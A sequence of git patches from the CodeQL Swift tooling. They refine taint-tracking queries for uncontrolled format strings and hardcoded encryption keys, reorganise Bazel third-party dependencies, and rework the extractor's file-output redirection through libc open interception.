UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:77:46:77:46 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | -| UncontrolledFormatString.swift:86:11:86:11 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:86:11:86:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | -| UncontrolledFormatString.swift:89:61:89:61 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:89:61:89:61 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | a user-provided value | +| UncontrolledFormatString.swift:68:28:68:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:68:28:68:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:71:28:71:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:71:28:71:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:72:28:72:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:72:28:72:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:74:28:74:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:74:28:74:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:75:28:75:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:75:28:75:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:76:28:76:28 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:76:28:76:28 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:77:46:77:46 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:77:46:77:46 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:86:11:86:11 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:86:11:86:11 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | +| UncontrolledFormatString.swift:89:61:89:61 | tainted | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) : | UncontrolledFormatString.swift:89:61:89:61 | tainted | This format string depends on $@. | UncontrolledFormatString.swift:62:24:62:77 | call to init(contentsOf:) | this user-provided value | From cf3345ee8f0caab63bf9b23da34c4ec1f849aa47 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 2 Dec 2022 12:01:43 +0000 Subject: [PATCH 025/381] Swift: Revert security-severity on CWE-321, for now. --- swift/ql/src/queries/Security/CWE-321/HardcodedEncryptionKey.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/swift/ql/src/queries/Security/CWE-321/HardcodedEncryptionKey.ql b/swift/ql/src/queries/Security/CWE-321/HardcodedEncryptionKey.ql index 36132d93b78..2f2c88855b2 100644 --- a/swift/ql/src/queries/Security/CWE-321/HardcodedEncryptionKey.ql +++ b/swift/ql/src/queries/Security/CWE-321/HardcodedEncryptionKey.ql @@ -3,7 +3,7 @@ * @description Using hardcoded keys for encryption is not secure, because potential attackers can easily guess them. * @kind path-problem * @problem.severity error - * @security-severity 7.7 + * @security-severity 8.1 * @precision high * @id swift/hardcoded-key * @tags security From dba344451f9c24cad6a29a45b1a6f9318f6e2f5d Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 8 Dec 2022 11:26:24 +0000 Subject: [PATCH 026/381] Swift: Add UncontrolledFormatStringExtensions.qll. --- .../UncontrolledFormatStringExtensions.qll | 36 +++++++++++++++++++ .../UncontrolledFormatStringQuery.qll | 11 ++++-- 2 files changed, 45 insertions(+), 2 deletions(-) create mode 100644 swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll diff --git a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll new file mode 100644 index 00000000000..3e9572ab37d --- /dev/null +++ b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll @@ -0,0 +1,36 @@ +/** + * Provides classes and predicates for reasoning about uncontrolled + * format string vulnerabilities. + */ + +import swift +import codeql.swift.StringFormat +import codeql.swift.dataflow.DataFlow +import codeql.swift.dataflow.TaintTracking + +/** + * A dataflow sink for uncontrolled format string vulnerabilities. + */ +abstract class UncontrolledFormatStringSink extends DataFlow::Node { } + +/** + * A sanitizer for uncontrolled format string vulnerabilities. + */ +abstract class UncontrolledFormatStringSanitizer extends DataFlow::Node { } + +/** + * A unit class for adding additional taint steps. + */ +class UncontrolledFormatStringAdditionalTaintStep extends Unit { + abstract predicate step(DataFlow::Node nodeFrom, DataFlow::Node nodeTo); +} + +/** + * A default uncontrolled format string sink, that is, the format argument to + * a `FormattingFunctionCall`. + */ +private class DefaultUncontrolledFormatStringSink extends UncontrolledFormatStringSink { + DefaultUncontrolledFormatStringSink() { + this.asExpr() = any(FormattingFunctionCall fc).getFormat() + } +} diff --git a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringQuery.qll b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringQuery.qll index 41ff57f2084..bb8aee50ac4 100644 --- a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringQuery.qll +++ b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringQuery.qll @@ -8,6 +8,7 @@ import codeql.swift.StringFormat import codeql.swift.dataflow.DataFlow import codeql.swift.dataflow.TaintTracking import codeql.swift.dataflow.FlowSources +import codeql.swift.security.UncontrolledFormatStringExtensions /** * A taint configuration for tainted data that reaches a format string. @@ -17,7 +18,13 @@ class TaintedFormatConfiguration extends TaintTracking::Configuration { override predicate isSource(DataFlow::Node node) { node instanceof FlowSource } - override predicate isSink(DataFlow::Node node) { - node.asExpr() = any(FormattingFunctionCall fc).getFormat() + override predicate isSink(DataFlow::Node node) { node instanceof UncontrolledFormatStringSink } + + override predicate isSanitizer(DataFlow::Node sanitizer) { + sanitizer instanceof UncontrolledFormatStringSanitizer + } + + override predicate isAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { + any(UncontrolledFormatStringAdditionalTaintStep s).step(nodeFrom, nodeTo) } } From 07ea006cee9530b00ce55297838742c6b32a5920 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 8 Dec 2022 11:36:55 +0000 Subject: [PATCH 027/381] Swift: Add support for CSV modelled sinks as well. --- .../UncontrolledFormatStringExtensions.qll | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll index 3e9572ab37d..4f8c70f81c4 100644 --- a/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll +++ b/swift/ql/lib/codeql/swift/security/UncontrolledFormatStringExtensions.qll @@ -4,9 +4,10 @@ */ import swift -import codeql.swift.StringFormat -import codeql.swift.dataflow.DataFlow -import codeql.swift.dataflow.TaintTracking +private import codeql.swift.StringFormat +private import codeql.swift.dataflow.DataFlow +private import codeql.swift.dataflow.TaintTracking +private import codeql.swift.dataflow.ExternalFlow /** * A dataflow sink for uncontrolled format string vulnerabilities. @@ -26,11 +27,14 @@ class UncontrolledFormatStringAdditionalTaintStep extends Unit { } /** - * A default uncontrolled format string sink, that is, the format argument to - * a `FormattingFunctionCall`. + * A default uncontrolled format string sink. */ private class DefaultUncontrolledFormatStringSink extends UncontrolledFormatStringSink { DefaultUncontrolledFormatStringSink() { + // the format argument to a `FormattingFunctionCall`. this.asExpr() = any(FormattingFunctionCall fc).getFormat() + or + // a sink defined in a Csv model. + sinkNode(this, "uncontrolled-format-string") } } From 24ce1c27bc084eb1c1f62aee2d8cbcc5f1b1d485 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Thu, 8 Dec 2022 13:09:37 +0000 Subject: [PATCH 028/381] Swift: Autoformat. --- swift/ql/lib/codeql/swift/StringFormat.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/swift/ql/lib/codeql/swift/StringFormat.qll b/swift/ql/lib/codeql/swift/StringFormat.qll index 4dbb127fc69..41eeb6efdcd 100644 --- a/swift/ql/lib/codeql/swift/StringFormat.qll +++ b/swift/ql/lib/codeql/swift/StringFormat.qll @@ -1,7 +1,7 @@ /** * Provides classes and predicates for reasoning about string formatting. */ - + import swift /** From 219ed64b7414a7b06424b80370bfef867df4e326 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 8 Dec 2022 11:00:00 +0100 Subject: [PATCH 029/381] Swift: reorganize bazel third party dependencies --- misc/bazel/workspace.bzl | 42 +-------------- swift/third_party/BUILD.bazel | 0 swift/third_party/load.bzl | 52 +++++++++++++++++++ ...t.bazel => BUILD.swift-llvm-support.bazel} | 0 4 files changed, 54 insertions(+), 40 deletions(-) create mode 100644 swift/third_party/BUILD.bazel create mode 100644 swift/third_party/load.bzl rename swift/third_party/swift-llvm-support/{BUILD.swift-prebuilt.bazel => BUILD.swift-llvm-support.bazel} (100%) diff --git a/misc/bazel/workspace.bzl b/misc/bazel/workspace.bzl index d0aee216668..46426f48d5c 100644 --- a/misc/bazel/workspace.bzl +++ b/misc/bazel/workspace.bzl @@ -1,47 +1,9 @@ load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive") load("@bazel_tools//tools/build_defs/repo:utils.bzl", "maybe") - -_swift_prebuilt_version = "swift-5.7.1-RELEASE.44428.89" -_swift_sha_map = { - "Linux-X64": "1fa0b62b3a87c6528bd21b3f3fa1b32ad00e2b6ff04c20652c93c7d00c4cf517", - "macOS-X64": "6e1239335874cbde635ae9ca9eeb215efee4988888a75f4eda1abbcf97e4d038", -} - -_swift_arch_map = { - "Linux-X64": "linux", - "macOS-X64": "darwin_x86_64", -} +load("//swift/third_party:load.bzl", load_swift_dependencies = "load_dependencies") def codeql_workspace(repository_name = "codeql"): - for repo_arch, arch in _swift_arch_map.items(): - sha256 = _swift_sha_map[repo_arch] - - http_archive( - name = "swift_prebuilt_%s" % arch, - url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/download/%s/swift-prebuilt-%s.zip" % ( - _swift_prebuilt_version, - repo_arch, - ), - build_file = "@%s//swift/third_party/swift-llvm-support:BUILD.swift-prebuilt.bazel" % repository_name, - sha256 = sha256, - ) - - http_archive( - name = "fishhook", - url = "https://github.com/facebook/fishhook/archive/aadc161ac3b80db07a9908851839a17ba63a9eb1.zip", - build_file = "@%s//swift/third_party/fishhook:BUILD.fishhook.bazel" % repository_name, - strip_prefix = "fishhook-aadc161ac3b80db07a9908851839a17ba63a9eb1", - sha256 = "9f2cdee6dcc2039d4c47d25ab5141fe0678ce6ed27ef482cab17fe9fa38a30ce", - ) - - http_archive( - name = "picosha2", - url = "https://github.com/okdshin/PicoSHA2/archive/27fcf6979298949e8a462e16d09a0351c18fcaf2.zip", - strip_prefix = "PicoSHA2-27fcf6979298949e8a462e16d09a0351c18fcaf2", - build_file = "@%s//swift/third_party/picosha2:BUILD.picosha2.bazel" % repository_name, - sha256 = "d6647ca45a8b7bdaf027ecb68d041b22a899a0218b7206dee755c558a2725abb", - ) - + load_swift_dependencies(repository_name) maybe( repo_rule = http_archive, name = "rules_pkg", diff --git a/swift/third_party/BUILD.bazel b/swift/third_party/BUILD.bazel new file mode 100644 index 00000000000..e69de29bb2d diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl new file mode 100644 index 00000000000..8621ee65b07 --- /dev/null +++ b/swift/third_party/load.bzl @@ -0,0 +1,52 @@ +load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive") + +_swift_prebuilt_version = "swift-5.7.1-RELEASE.44428.89" +_swift_sha_map = { + "Linux-X64": "1fa0b62b3a87c6528bd21b3f3fa1b32ad00e2b6ff04c20652c93c7d00c4cf517", + "macOS-X64": "6e1239335874cbde635ae9ca9eeb215efee4988888a75f4eda1abbcf97e4d038", +} + +_swift_arch_map = { + "Linux-X64": "linux", + "macOS-X64": "darwin_x86_64", +} + +def _get_label(repository_name, package, target): + return "@%s//swift/third_party/%s:%s" % (repository_name, package, target) + +def _get_build(repository_name, package): + return _get_label(repository_name, package, "BUILD.%s.bazel" % package) + +def _get_patch(repository_name, package, patch): + return _get_label(repository_name, package, "patches/%s.patch" % patch) + +def load_dependencies(repository_name): + for repo_arch, arch in _swift_arch_map.items(): + sha256 = _swift_sha_map[repo_arch] + + http_archive( + name = "swift_prebuilt_%s" % arch, + url = "https://github.com/dsp-testing/codeql-swift-artifacts/releases/download/%s/swift-prebuilt-%s.zip" % ( + _swift_prebuilt_version, + repo_arch, + ), + build_file = _get_build(repository_name, "swift-llvm-support"), + sha256 = sha256, + patch_args = ["-p1"], + ) + + http_archive( + name = "fishhook", + url = "https://github.com/facebook/fishhook/archive/aadc161ac3b80db07a9908851839a17ba63a9eb1.zip", + build_file = "@%s//swift/third_party/fishhook:BUILD.fishhook.bazel" % repository_name, + strip_prefix = "fishhook-aadc161ac3b80db07a9908851839a17ba63a9eb1", + sha256 = "9f2cdee6dcc2039d4c47d25ab5141fe0678ce6ed27ef482cab17fe9fa38a30ce", + ) + + http_archive( + name = "picosha2", + url = "https://github.com/okdshin/PicoSHA2/archive/27fcf6979298949e8a462e16d09a0351c18fcaf2.zip", + strip_prefix = "PicoSHA2-27fcf6979298949e8a462e16d09a0351c18fcaf2", + build_file = _get_build(repository_name, "picosha2"), + sha256 = "d6647ca45a8b7bdaf027ecb68d041b22a899a0218b7206dee755c558a2725abb", + ) diff --git a/swift/third_party/swift-llvm-support/BUILD.swift-prebuilt.bazel b/swift/third_party/swift-llvm-support/BUILD.swift-llvm-support.bazel similarity index 100% rename from swift/third_party/swift-llvm-support/BUILD.swift-prebuilt.bazel rename to swift/third_party/swift-llvm-support/BUILD.swift-llvm-support.bazel From 944adfe727793f432868875ce0c3efaa36cdedb7 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Thu, 8 Dec 2022 11:14:22 +0100 Subject: [PATCH 030/381] Swift: allow modifying frontend outputs --- swift/third_party/load.bzl | 3 +++ .../patches/allow_modfying_output.patch | 12 ++++++++++++ 2 files changed, 15 insertions(+) create mode 100644 swift/third_party/swift-llvm-support/patches/allow_modfying_output.patch diff --git a/swift/third_party/load.bzl b/swift/third_party/load.bzl index 8621ee65b07..fbd98b6aedb 100644 --- a/swift/third_party/load.bzl +++ b/swift/third_party/load.bzl @@ -33,6 +33,9 @@ def load_dependencies(repository_name): build_file = _get_build(repository_name, "swift-llvm-support"), sha256 = sha256, patch_args = ["-p1"], + patches = [ + _get_patch(repository_name, "swift-llvm-support", "allow_modfying_output"), + ], ) http_archive( diff --git a/swift/third_party/swift-llvm-support/patches/allow_modfying_output.patch b/swift/third_party/swift-llvm-support/patches/allow_modfying_output.patch new file mode 100644 index 00000000000..9a7e4e0964a --- /dev/null +++ b/swift/third_party/swift-llvm-support/patches/allow_modfying_output.patch @@ -0,0 +1,12 @@ +We want to be able to redirect module output options to an internal artifact storage. +--- a/include/swift/Frontend/FrontendInputsAndOutputs.h 2022-11-30 12:57:18.000000000 +0100 ++++ b/include/swift/Frontend/FrontendInputsAndOutputs.h 2022-12-08 10:30:43.286040435 +0100 +@@ -182,8 +182,6 @@ + llvm::MemoryBuffer *buffer = nullptr); + + // Outputs +- +-private: + friend class ArgsToFrontendOptionsConverter; + friend struct InterfaceSubContextDelegateImpl; + void setMainAndSupplementaryOutputs( From bf1b32f210c7390a16859611b52e83823c7965cc Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Mon, 5 Dec 2022 17:22:45 +0100 Subject: [PATCH 031/381] Swift: rework file redirection The hash map mechanism that was already in use for reading swiftmodule files on macOS is now in use also on Linux. The output replacing mechanism has been also reworked so that: * frontend module emission modes have the remapping done directly in the internal frontend options instead of painstakingly modifying input flags (this requires a patch on the swift headers though) * object emission mode is silenced to be just a type checking pass, thus producing no output files * all other passes but some debugging and version related ones become noops The open file read redirection uses a global weak pointer instance to maximize robustness in the face of possibly multi-threaded calls to open happening while `main` is exiting. Possibly overkill, but better safe than sorry. --- swift/extractor/BUILD.bazel | 1 + swift/extractor/SwiftExtractor.h | 2 +- swift/extractor/TargetTrapFile.cpp | 5 - swift/extractor/TargetTrapFile.h | 2 +- swift/extractor/config/BUILD.bazel | 8 + .../SwiftExtractorConfiguration.h | 4 +- swift/extractor/main.cpp | 106 +++++++----- swift/extractor/remapping/BUILD.bazel | 18 +- .../remapping/SwiftFileInterception.cpp | 160 ++++++++++++++++++ .../remapping/SwiftFileInterception.h | 19 +++ .../remapping/SwiftOpenInterception.Linux.cpp | 9 - .../remapping/SwiftOpenInterception.h | 15 -- .../remapping/SwiftOpenInterception.macOS.cpp | 85 ---------- .../remapping/SwiftOutputRewrite.cpp | 137 --------------- .../extractor/remapping/SwiftOutputRewrite.h | 21 --- .../posix-only/frontend-invocations/F1.swift | 1 + .../posix-only/frontend-invocations/F2.swift | 1 + .../posix-only/frontend-invocations/build.sh | 2 +- 18 files changed, 263 insertions(+), 333 deletions(-) create mode 100644 swift/extractor/config/BUILD.bazel rename swift/extractor/{ => config}/SwiftExtractorConfiguration.h (88%) create mode 100644 swift/extractor/remapping/SwiftFileInterception.cpp create mode 100644 swift/extractor/remapping/SwiftFileInterception.h delete mode 100644 swift/extractor/remapping/SwiftOpenInterception.Linux.cpp delete mode 100644 swift/extractor/remapping/SwiftOpenInterception.h delete mode 100644 swift/extractor/remapping/SwiftOpenInterception.macOS.cpp delete mode 100644 swift/extractor/remapping/SwiftOutputRewrite.cpp delete mode 100644 swift/extractor/remapping/SwiftOutputRewrite.h diff --git a/swift/extractor/BUILD.bazel b/swift/extractor/BUILD.bazel index 2e6d93adf8c..101e8657c3f 100644 --- a/swift/extractor/BUILD.bazel +++ b/swift/extractor/BUILD.bazel @@ -9,6 +9,7 @@ swift_cc_binary( ]), visibility = ["//swift:__pkg__"], deps = [ + "//swift/extractor/config", "//swift/extractor/infra", "//swift/extractor/invocation", "//swift/extractor/remapping", diff --git a/swift/extractor/SwiftExtractor.h b/swift/extractor/SwiftExtractor.h index f8c6dbfb6c7..d59c3163390 100644 --- a/swift/extractor/SwiftExtractor.h +++ b/swift/extractor/SwiftExtractor.h @@ -1,6 +1,6 @@ #pragma once -#include "swift/extractor/SwiftExtractorConfiguration.h" +#include "swift/extractor/config/SwiftExtractorConfiguration.h" #include #include #include diff --git a/swift/extractor/TargetTrapFile.cpp b/swift/extractor/TargetTrapFile.cpp index d1f1ca8520b..4677568c248 100644 --- a/swift/extractor/TargetTrapFile.cpp +++ b/swift/extractor/TargetTrapFile.cpp @@ -11,11 +11,6 @@ std::optional createTargetTrapFile(const SwiftExtractorConfiguration for (const auto& opt : configuration.frontendOptions) { *ret << " " << std::quoted(opt) << " \\\n"; } - *ret << "\n*/\n" - "/* swift-frontend-args:\n"; - for (const auto& opt : configuration.patchedFrontendOptions) { - *ret << " " << std::quoted(opt) << " \\\n"; - } *ret << "\n*/\n"; } return ret; diff --git a/swift/extractor/TargetTrapFile.h b/swift/extractor/TargetTrapFile.h index 8e4f99fcad2..f8cf5bf4277 100644 --- a/swift/extractor/TargetTrapFile.h +++ b/swift/extractor/TargetTrapFile.h @@ -1,7 +1,7 @@ #pragma once #include "swift/extractor/infra/file/TargetFile.h" -#include "swift/extractor/SwiftExtractorConfiguration.h" +#include "swift/extractor/config/SwiftExtractorConfiguration.h" namespace codeql { diff --git a/swift/extractor/config/BUILD.bazel b/swift/extractor/config/BUILD.bazel new file mode 100644 index 00000000000..492db13f666 --- /dev/null +++ b/swift/extractor/config/BUILD.bazel @@ -0,0 +1,8 @@ +load("//swift:rules.bzl", "swift_cc_library") + +swift_cc_library( + name = "config", + srcs = glob(["*.cpp"]), + hdrs = glob(["*.h"]), + visibility = ["//swift:__subpackages__"], +) diff --git a/swift/extractor/SwiftExtractorConfiguration.h b/swift/extractor/config/SwiftExtractorConfiguration.h similarity index 88% rename from swift/extractor/SwiftExtractorConfiguration.h rename to swift/extractor/config/SwiftExtractorConfiguration.h index 04179d8c0c5..b9456148c89 100644 --- a/swift/extractor/SwiftExtractorConfiguration.h +++ b/swift/extractor/config/SwiftExtractorConfiguration.h @@ -17,9 +17,7 @@ struct SwiftExtractorConfiguration { std::filesystem::path scratchDir; // The original arguments passed to the extractor. Used for debugging. - std::vector frontendOptions; - // The patched arguments passed to the swift::performFrontend/ Used for debugging. - std::vector patchedFrontendOptions; + std::vector frontendOptions; // A temporary directory that contains TRAP files before they are moved into their final // destination. diff --git a/swift/extractor/main.cpp b/swift/extractor/main.cpp index ff975f5c25d..fff97ba9f51 100644 --- a/swift/extractor/main.cpp +++ b/swift/extractor/main.cpp @@ -12,13 +12,58 @@ #include "swift/extractor/SwiftExtractor.h" #include "swift/extractor/TargetTrapFile.h" -#include "swift/extractor/remapping/SwiftOutputRewrite.h" -#include "swift/extractor/remapping/SwiftOpenInterception.h" +#include "swift/extractor/remapping/SwiftFileInterception.h" #include "swift/extractor/invocation/SwiftDiagnosticsConsumer.h" #include "swift/extractor/trap/TrapDomain.h" using namespace std::string_literals; +static void lockOutputSwiftModuleTraps(const codeql::SwiftExtractorConfiguration& config, + const swift::CompilerInstance& compiler) { + std::filesystem::path output = compiler.getInvocation().getOutputFilename(); + if (output.extension() == ".swiftmodule") { + if (auto target = codeql::createTargetTrapFile(config, output)) { + *target << "// trap file deliberately empty\n" + "// this swiftmodule was created during the build, so its entities must have" + " been extracted directly from source files"; + } + } +} + +static void modifyFrontendOptions(swift::FrontendOptions& options) { + using Action = swift::FrontendOptions::ActionType; + switch (options.RequestedAction) { + case Action::EmitModuleOnly: + case Action::MergeModules: + case Action::CompileModuleFromInterface: + // for module emission actions, we redirect the output to our internal artifact storage + { + swift::SupplementaryOutputPaths paths; + paths.ModuleOutputPath = + codeql::redirect(options.InputsAndOutputs.getSingleOutputFilename()).string(); + options.InputsAndOutputs.setMainAndSupplementaryOutputs(std::vector{paths.ModuleOutputPath}, + std::vector{paths}); + return; + } + case Action::EmitObject: + // for object emission, we do a type check pass instead, muting output but getting the sema + // phase to run in order to extract everything + options.RequestedAction = Action::Typecheck; + return; + case Action::PrintVersion: + case Action::DumpAST: + case Action::PrintAST: + case Action::PrintASTDecl: + // these actions are nice to have on the extractor for debugging, so we preserve them. Also, + // version printing is used by CI to match up the correct compiler version + return; + default: + // otherwise, do nothing (the closest action to doing nothing is printing the version) + options.RequestedAction = Action::PrintVersion; + break; + } +} + // This is part of the swiftFrontendTool interface, we hook into the // compilation pipeline and extract files after the Swift frontend performed // semantic analysis @@ -28,8 +73,13 @@ class Observer : public swift::FrontendObserver { codeql::SwiftDiagnosticsConsumer& diagConsumer) : config{config}, diagConsumer{diagConsumer} {} + void parsedArgs(swift::CompilerInvocation& invocation) override { + modifyFrontendOptions(invocation.getFrontendOptions()); + } + void configuredCompiler(swift::CompilerInstance& instance) override { instance.addDiagnosticConsumer(&diagConsumer); + lockOutputSwiftModuleTraps(config, instance); } void performedSemanticAnalysis(swift::CompilerInstance& compiler) override { @@ -48,19 +98,6 @@ static std::string getenv_or(const char* envvar, const std::string& def) { return def; } -static void lockOutputSwiftModuleTraps(const codeql::SwiftExtractorConfiguration& config, - const codeql::PathRemapping& remapping) { - for (const auto& [oldPath, newPath] : remapping) { - if (oldPath.extension() == ".swiftmodule") { - if (auto target = codeql::createTargetTrapFile(config, oldPath)) { - *target << "// trap file deliberately empty\n" - "// this swiftmodule was created during the build, so its entities must have" - " been extracted directly from source files"; - } - } - } -} - static bool checkRunUnderFilter(int argc, char* const* argv) { auto runUnderFilter = getenv("CODEQL_EXTRACTOR_SWIFT_RUN_UNDER_FILTER"); if (runUnderFilter == nullptr) { @@ -106,7 +143,7 @@ static void checkWhetherToRunUnderTool(int argc, char* const* argv) { // Creates a target file that should store per-invocation info, e.g. compilation args, // compilations, diagnostics, etc. -codeql::TargetFile invocationTargetFile(codeql::SwiftExtractorConfiguration& configuration) { +codeql::TargetFile invocationTargetFile(const codeql::SwiftExtractorConfiguration& configuration) { auto timestamp = std::chrono::system_clock::now().time_since_epoch().count(); auto filename = std::to_string(timestamp) + '-' + std::to_string(getpid()); auto target = std::filesystem::path("invocations") / std::filesystem::path(filename); @@ -118,6 +155,15 @@ codeql::TargetFile invocationTargetFile(codeql::SwiftExtractorConfiguration& con return std::move(maybeFile.value()); } +codeql::SwiftExtractorConfiguration configure(int argc, char** argv) { + codeql::SwiftExtractorConfiguration configuration{}; + configuration.trapDir = getenv_or("CODEQL_EXTRACTOR_SWIFT_TRAP_DIR", "."); + configuration.sourceArchiveDir = getenv_or("CODEQL_EXTRACTOR_SWIFT_SOURCE_ARCHIVE_DIR", "."); + configuration.scratchDir = getenv_or("CODEQL_EXTRACTOR_SWIFT_SCRATCH_DIR", "."); + configuration.frontendOptions.assign(argv + 1, argv + argc); + return configuration; +} + int main(int argc, char** argv) { checkWhetherToRunUnderTool(argc, argv); @@ -130,36 +176,16 @@ int main(int argc, char** argv) { PROGRAM_START(argc, argv); INITIALIZE_LLVM(); - codeql::SwiftExtractorConfiguration configuration{}; - configuration.trapDir = getenv_or("CODEQL_EXTRACTOR_SWIFT_TRAP_DIR", "."); - configuration.sourceArchiveDir = getenv_or("CODEQL_EXTRACTOR_SWIFT_SOURCE_ARCHIVE_DIR", "."); - configuration.scratchDir = getenv_or("CODEQL_EXTRACTOR_SWIFT_SCRATCH_DIR", "."); + const auto configuration = configure(argc, argv); - codeql::initRemapping(configuration.getTempArtifactDir()); - - configuration.frontendOptions.reserve(argc - 1); - for (int i = 1; i < argc; i++) { - configuration.frontendOptions.push_back(argv[i]); - } - configuration.patchedFrontendOptions = configuration.frontendOptions; - - auto remapping = codeql::rewriteOutputsInPlace(configuration.getTempArtifactDir(), - configuration.patchedFrontendOptions); - codeql::ensureDirectoriesForNewPathsExist(remapping); - lockOutputSwiftModuleTraps(configuration, remapping); - - std::vector args; - for (auto& arg : configuration.patchedFrontendOptions) { - args.push_back(arg.c_str()); - } + auto openInterception = codeql::setupFileInterception(configuration.getTempArtifactDir()); auto invocationTrapFile = invocationTargetFile(configuration); codeql::TrapDomain invocationDomain(invocationTrapFile); codeql::SwiftDiagnosticsConsumer diagConsumer(invocationDomain); Observer observer(configuration, diagConsumer); - int frontend_rc = swift::performFrontend(args, "swift-extractor", (void*)main, &observer); - - codeql::finalizeRemapping(remapping); + int frontend_rc = swift::performFrontend(configuration.frontendOptions, "swift-extractor", + (void*)main, &observer); return frontend_rc; } diff --git a/swift/extractor/remapping/BUILD.bazel b/swift/extractor/remapping/BUILD.bazel index 84f942f7708..dafd1f9e3a9 100644 --- a/swift/extractor/remapping/BUILD.bazel +++ b/swift/extractor/remapping/BUILD.bazel @@ -2,23 +2,11 @@ load("//swift:rules.bzl", "swift_cc_library") swift_cc_library( name = "remapping", - srcs = ["SwiftOutputRewrite.cpp"] + select({ - "@platforms//os:linux": [ - "SwiftOpenInterception.Linux.cpp", - ], - "@platforms//os:macos": [ - "SwiftOpenInterception.macOS.cpp", - ], - }), + srcs = glob(["*.cpp"]), hdrs = glob(["*.h"]), visibility = ["//swift:__subpackages__"], deps = [ - "//swift/third_party/swift-llvm-support", "//swift/extractor/infra/file", - ] + select({ - "@platforms//os:linux": [], - "@platforms//os:macos": [ - "@fishhook//:fishhook", - ], - }), + "//swift/third_party/swift-llvm-support", + ], ) diff --git a/swift/extractor/remapping/SwiftFileInterception.cpp b/swift/extractor/remapping/SwiftFileInterception.cpp new file mode 100644 index 00000000000..5743826fb22 --- /dev/null +++ b/swift/extractor/remapping/SwiftFileInterception.cpp @@ -0,0 +1,160 @@ +#include "swift/extractor/remapping/SwiftFileInterception.h" + +#include +#include + +#include +#include +#include +#include + +#include "swift/extractor/infra/file/FileHash.h" +#include "swift/extractor/infra/file/FileHash.h" + +#ifdef __APPLE__ +#define SHARED_LIBC "libc.dylib" +#define FILE_CREATION_MODE O_CREAT +#else +#define SHARED_LIBC "libc.so.6" +#define FILE_CREATION_MODE (O_CREAT | O_TMPFILE) +#endif + +namespace fs = std::filesystem; + +namespace { +namespace original { + +void* libc() { + static auto ret = dlopen(SHARED_LIBC, RTLD_LAZY); + return ret; +} + +template +Signature get(const char* name) { + return reinterpret_cast(dlsym(libc(), name)); +} + +int open(const char* path, int flags, mode_t mode = 0) { + static auto original = get("open"); + return original(path, flags, mode); +} + 